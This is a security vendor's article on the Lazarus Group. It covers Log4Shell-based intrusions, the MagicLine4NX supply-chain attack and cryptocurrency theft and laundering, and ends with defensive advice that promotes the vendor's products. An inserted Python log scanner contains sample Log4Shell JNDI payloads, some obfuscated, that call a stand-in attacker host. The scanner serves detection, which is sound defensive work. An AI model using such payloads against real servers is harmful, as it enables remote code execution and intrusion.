How to guard against security attacks from North Korean hackers?
Written by: MetaTrust Labs
On January 1, 2024, a hacker attack on Orbit Chain attracted global attention in the cryptocurrency community. It was reported that hackers exploited vulnerabilities in Orbit Chain to steal $81.5 million worth of cryptocurrency and transferred it to other addresses. Orbit Chain officials have confirmed the incident and stated that they are cooperating with international law enforcement agencies to track the identity and motives of the attackers. Some security experts believe that the tactics and targets of this attack are similar to the style of Lazarus, a North Korean hacker organization, and may be another cybercrime by the organization.
Who is the Lazarus organization, and why does their activity raise such high alert internationally? How do they use cryptocurrency to bypass international sanctions and anti-money laundering measures?
Lazarus, a North Korean Hacker Organization
The Lazarus hacker organization is a well-known group with official ties to North Korea and has been operating for over a decade since 2009. The organization is known for targeting organizations globally, with actions including attacks on financial institutions, media, and government agencies. The Lazarus Group is controlled by the 121st Bureau under the North Korean Reconnaissance General Bureau. The organization is notorious for attacking banks and cryptocurrency exchanges to gain economic benefits by stealing funds and data. The Lazarus Group treats programmers with high regard and encourages individuals with computer talent to join their official "hacker" ranks.
The Pyongyang Automation University is one of the important sources of Lazarus Group hackers. The organization has shifted its focus from political attacks to economic attacks, with a specific focus on the cryptocurrency world. Their activities also involve targeting security researchers, embedding malicious code in open-source cryptocurrency platforms, executing large-scale cryptocurrency robberies, and spreading malware through fake job interviews. The funds obtained by these hacker organizations through illegal means often go through typical money laundering processes used by traditional cybercrime groups, with stolen cryptocurrency frequently converted into fiat currency to evade anti-money laundering measures.
South Korea, the United States, and Japan have maintained a high level of vigilance against North Korean hacker organizations. It has been reported that North Korean hacker organizations have successfully stolen $3 billion worth of cryptocurrency funds in the past few years, which have been used to support North Korea's nuclear and ballistic missile programs. Security advisors from the United States, South Korea, and Japan met in Seoul to discuss how to address the risks posed by North Korea in cyberspace and announced a new trilateral cooperation initiative focusing on North Korea's cybercrime and cryptocurrency money laundering activities. The meeting took place at a time of heightened tension on the Korean Peninsula, as North Korea accelerated the expansion of its nuclear weapons and missile programs and openly displayed its willingness to use nuclear weapons preemptively.
The tactics and targets of the Lazarus hacker organization are diverse, ranging from attacks on the SWIFT network of financial institutions to broader cryptocurrency robberies, demonstrating the group's high technical capability and the threat it poses. However, there are relatively few measures in place to prevent these attacks. Since 2018, North Korean hackers have stolen approximately $2 billion in virtual currency. In 2023 alone, they stole about $200 million in cryptocurrency, accounting for 20% of the funds stolen that year. The presence of these hackers poses a continuous threat to the cryptocurrency ecosystem, and their methods of cyber attacks are becoming increasingly sophisticated and complex.
The scale of activity of North Korean hacker organizations is roughly 10 times that of other malicious actors, and they also target decentralized finance ecosystems. They use various methods for cyber attacks, including phishing, supply chain attacks, and other forms of hacking. Therefore, both businesses and individual users need to strengthen their network security measures, regularly update software, strengthen password policies, and increase their focus on network security. At the same time, regulatory agencies need to strengthen supervision and establish stricter laws and regulations to curb this type of cybercrime.
Attack Case 1: Lazarus exploits the Log4Shell vulnerability for the Blacksmith operation
Attack process and methods:
Exploiting the Log4Shell vulnerability: Lazarus first exploits the Log4Shell vulnerability, a remote code execution flaw discovered in the Log4j logging library. Although the vulnerability was discovered and patched two years ago, many systems may still run unpatched versions, giving Lazarus an entry point.
Deployment of proxy tools: Once initial access is obtained, Lazarus sets up a proxy tool for persistent access on the compromised server. This tool allows them to run reconnaissance commands, create new administrator accounts, and deploy other credential-stealing tools.
Deployment of NineRAT: In the second stage, Lazarus deploys the NineRAT malware on the system. NineRAT is a remote access Trojan that can collect system information, upgrade to new versions, stop execution, self-uninstall, and upload files from the infected computer. It also includes a dropper responsible for establishing persistence and launching the main binary.
Use of DLRAT and BottomLoader: Lazarus also uses DLRAT and BottomLoader. DLRAT is a Trojan and downloader that allows Lazarus to introduce additional payloads on the infected system. BottomLoader is a malware downloader that can retrieve and execute payloads from hardcoded URLs.
Credential theft and persistence: Lazarus uses tools such as ProcDump and Mimikatz to dump credentials and gather further system information. Persistence, including the launching of updated payloads or the removal of old ones, is achieved by creating URL files in the system's startup directory.
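To illustrate the detection side of Case 1, here is an added example in Python (not from the article or from MetaTrust Labs): a scanner that normalizes nested Log4j lookups in constructed web-server log lines and flags any line that resolves to a jndi: lookup, the signature of a Log4Shell (CVE-2021-44228) probe. The log lines and hostnames are constructed, and the normalization models only the lower, upper and default-value lookups.

```python
import re

# Constructed sample web-server log lines (not from the article or any real incident).
# The User-Agent field is a common place for Log4Shell probes, but the same check
# applies to any string a Log4j 2.x application might log.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02] "GET /login HTTP/1.1" 200 120 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03] "GET /api HTTP/1.1" 200 120 "-" "${${lower:j}ndi:${lower:r}mi://attacker.example/x}"',
    '10.0.0.9 - - [01/Jan/2024:10:00:04] "GET /api HTTP/1.1" 200 120 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/y}"',
    '10.0.0.7 - - [01/Jan/2024:10:00:05] "GET /docs/${version} HTTP/1.1" 404 0 "-" "curl/8.0"',
]

INNERMOST_LOOKUP = re.compile(r"\$\{([^{}]*)\}")   # a ${...} with no nested braces
JNDI = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)  # what remains after normalization

def _resolve(match):
    """Evaluate one innermost Log4j lookup the way Log4j 2.x would, or keep it."""
    inner = match.group(1)
    key = inner.lower()
    if key.startswith("lower:"):
        return inner[6:].lower()
    if key.startswith("upper:"):
        return inner[6:].upper()
    if key.startswith("jndi:"):
        return match.group(0)              # keep it: this is the indicator we want
    if ":-" in inner:                      # ${env:X:-default} or ${::-d} -> default value
        return inner.split(":-", 1)[1]
    return match.group(0)                  # unknown lookup (e.g. ${version}): leave as is

def normalize(text, max_rounds=20):
    """Collapse nested lookups from the inside out; bounded to guarantee termination."""
    for _ in range(max_rounds):
        resolved = INNERMOST_LOOKUP.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text

def scan(lines):
    """Return (line_number, normalized_line) for every line carrying a jndi lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((number, norm))
    return hits

if __name__ == "__main__":
    for number, text in scan(SAMPLE_LOGS):
        print(f"line {number}: {text}")
```

Patching log4j-core remains the actual fix; this check only surfaces attempts already in your logs and will miss encodings it does not model.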
Reference links:
https://www.csoonline.com/article/1259949/lazarus-apt-attack-campaign-shows-log4shell-exploitation-remains-popular.html
https://nvd.nist.gov/vuln/detail/cve-2021-44228
Attack Case 2: Lazarus hacker organization uses MagicLine4NX software for supply chain attacks
Attack process:
Watering hole attack: The Lazarus hacker organization infiltrates websites frequently visited by specific users and embeds malicious scripts. When users of the MagicLine4NX authentication software access these websites, the embedded code executes, allowing the hackers to fully control the system.
Exploiting system vulnerabilities to spread malicious code: Hackers exploit zero-day vulnerabilities in the MagicLine4NX software so that personal computers connected to the network reach the attackers' internet-facing servers. They then propagate the malicious code to business-side servers through the data synchronization feature.
Attempted data transfer: The malware attempts to establish connections with two C2 servers, one inside the network system's gateway and the other on the external internet. If successful, a large amount of internal network information may be leaked.
Technical means:
Zero-day vulnerability exploitation: Hackers exploit zero-day vulnerabilities in the MagicLine4NX software, which are vulnerabilities that have not yet been publicly disclosed, allowing them unauthorized access to the target system.
Supply chain attack: By exploiting vulnerabilities in the supply chain, hackers can bypass normal security measures and directly attack the target system.
Data synchronization and connection to C2 servers: Hackers use the data synchronization feature to spread malicious code to business-side servers and attempt to establish a connection with external C2 servers for further control and data theft.
Reference links:
https://www.zerofox.com/advisories/22471/
https://nvd.nist.gov/vuln/detail/CVE-2023-45797
Attack Case 3: Attacks on Cryptocurrency
Target: Cryptocurrency exchanges, wallets, decentralized finance (DeFi) ecosystems
Attack Time: Since 2018, especially in 2023
Attack Process and Techniques:
Exploiting vulnerabilities and leaked private keys: North Korean hackers use phishing and supply chain attacks with leaked private keys or seed phrases to invade targets.
Cross-chain attacks: They specifically target cross-chain bridges, such as the Axie Infinity Ronin Bridge, to steal large amounts of virtual currency.
Multi-stage money laundering process: North Korean hackers have used complex "multi-stage money laundering processes" in the past to obscure the source and destination of funds. They convert stolen virtual currency into different tokens, then mix and exchange them multiple times through automated programs, mixers, and cross-chain exchanges to increase the difficulty of tracking.
Using decentralized exchanges: They convert stolen virtual currency into Ether through decentralized exchanges, then mix and exchange multiple times.
In summary, attackers can steal sensitive data, including confidential business information, customer data, and personal identity information, leading to privacy breaches and potential legal consequences. Due to the hackers' complete control over the target system, they may gain access to a large amount of sensitive information, including internal data and customer records. Lazarus's hacker actions not only lead to data leaks and system damage for the affected organizations but may also have a significant impact on their business operations.
These attacks often involve complex supply chain attacks, making prevention and detection more difficult. Attacks may result in financial losses, including the cost of malware removal, data recovery, system repairs, and income loss due to business interruptions. Hacker attacks have led to the theft of a large amount of virtual currency, causing economic losses for victims and potentially exposing their personal information and transaction data. Attacks on cross-chain bridges may lead to the paralysis of entire systems, affecting the normal conduct of transactions.
To address such security threats, organizations are advised to take the following preventive measures:
Timely patching of vulnerabilities: Ensure timely application of security patches to fix known vulnerabilities. Especially for software and components used in the supply chain, automated auditing with MetaScan can help identify and patch potential vulnerabilities in a timely manner.
Strengthen supply chain security: Establish secure partnerships with supply chain partners, review and verify software and components to ensure that all links in the supply chain are not vulnerable to hacker attacks. Dynamic updating of blacklists with MetaScout's monitoring feature can block attacks from potential North Korean hacker addresses.
Security awareness training: Strengthen employees' security awareness training. Educate employees about the importance of being vigilant against watering hole attacks, malicious scripts, and supply chain security to reduce the impact of human factors on security. Scantist's DevSecOps solution can provide organizations with comprehensive security training and guidance.
Network traffic monitoring: Implement network traffic monitoring and intrusion detection systems (IDS/IPS) to promptly detect abnormal activities and attack behaviors. MetaScout's attack blocking mechanism can identify and block hacker attack transactions in a timely manner, combined with network traffic monitoring.
Multi-layer defense: Use multiple defense measures, including firewalls, intrusion detection systems, antivirus software, etc., to enhance system security. MetaScan's Prover feature can be used in conjunction with existing security tools and measures to form a more comprehensive defense system.
Continuous monitoring and response: Establish a security monitoring and response mechanism to detect abnormal behavior in real-time and take appropriate response measures to minimize the impact of attacks. Scantist's component analysis feature can continuously monitor vulnerabilities in the software supply chain and intercept problematic open-source and third-party components in a timely manner.
Strengthen security measures for cryptocurrency exchanges and wallets: Cryptocurrency exchanges and wallets should strengthen their security measures, such as using strong passwords, regularly changing private keys, implementing multi-layer security policies, etc. MetaScout's blocking mechanism can provide attack blocking protection based on dynamic blacklists for cryptocurrency exchanges, ensuring the security of users' digital assets.
Regular audits and checks: Organizations should conduct regular security audits and checks to ensure there are no potential security vulnerabilities. MetaScan's automated auditing feature can help organizations conduct comprehensive security assessments and promptly identify potential vulnerabilities and risks.
Raise public awareness: Educate the public about the importance of cybersecurity and how to protect their digital assets. Organizations can raise public awareness of cybersecurity through promotional activities, social media, and provide relevant security advice and guidance.
It should be noted that security threats and prevention recommendations should be evaluated and customized based on actual circumstances and the latest security intelligence. In addition, regular data backup and recovery, the use of strong passwords and multi-factor authentication, and limiting privileged access are also effective measures to enhance security.
Disclaimer: This article represents only the author's personal views and not the position or views of this platform. It is provided for information sharing only and does not constitute investment advice to anyone. Any dispute between users and the author is unrelated to this platform. If an article or image published on this page infringes your rights, please send the relevant proof of rights and identity to support@aicoin.com, and the platform's staff will investigate.